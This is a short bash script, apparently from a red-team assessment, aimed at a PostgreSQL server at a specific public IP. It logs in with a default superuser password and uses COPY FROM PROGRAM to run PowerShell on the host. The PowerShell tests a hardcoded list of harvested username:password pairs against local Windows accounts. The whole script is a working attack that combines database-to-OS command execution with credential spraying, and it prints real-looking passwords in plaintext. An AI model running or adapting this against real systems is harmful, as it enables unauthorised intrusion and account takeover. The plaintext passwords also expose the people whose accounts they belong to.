#!/bin/bash
# L6: test OS-level auth on .57 with harvested creds (geoserver, adminx, iop, Administrator)
# via PowerShell credential validation (no remote actions, read-only).
set -u
OUT="/root/ir-assessment/redteam/gitlab_vdss_com_vn/L6_os_auth_raw.txt"
PSQL="host=14.225.11.57 port=5432 user=superuser_user dbname=postgres connect_timeout=10"
export PGPASSWORD='postgres'

{
  echo "===L6 OS AUTH TEST 14.225.11.57 $(date -u) ==="
  psql "$PSQL" -v ON_ERROR_STOP=1 -At <<'SQL'
DROP TABLE IF EXISTS pg_temp.o;
CREATE TEMP TABLE o(line text);
COPY o FROM PROGRAM $cmd$powershell -NoProfile -Command "Add-Type -AssemblyName System.DirectoryServices.AccountManagement; $ctx = New-Object System.DirectoryServices.AccountManagement.PrincipalContext('Machine'); $tries = @('geoserver:Ctech@123!','geoserver:geoserver','geoserver:Ctech2022!@#','adminx:Ctech@123!','adminx:Ctech2022!@#','adminx:admin','iop:Ctech@123!','iop:Ctech2022!@#','Administrator:Ctech@123!','Administrator:Ctech2022!@#','Administrator:123@123a'); foreach($t in $tries){ $u,$p = $t.Split(':',2); $r = $ctx.ValidateCredentials($u,$p); Write-Output ($u + ' : ' + $p + ' => ' + $r) }; Write-Output '===DONE==='$cmd$;
SELECT line FROM o;
SQL
  echo "===PSQL_EXIT=$?==="
} > "$OUT" 2>&1

echo "--- output file: $OUT ---"
wc -l "$OUT"
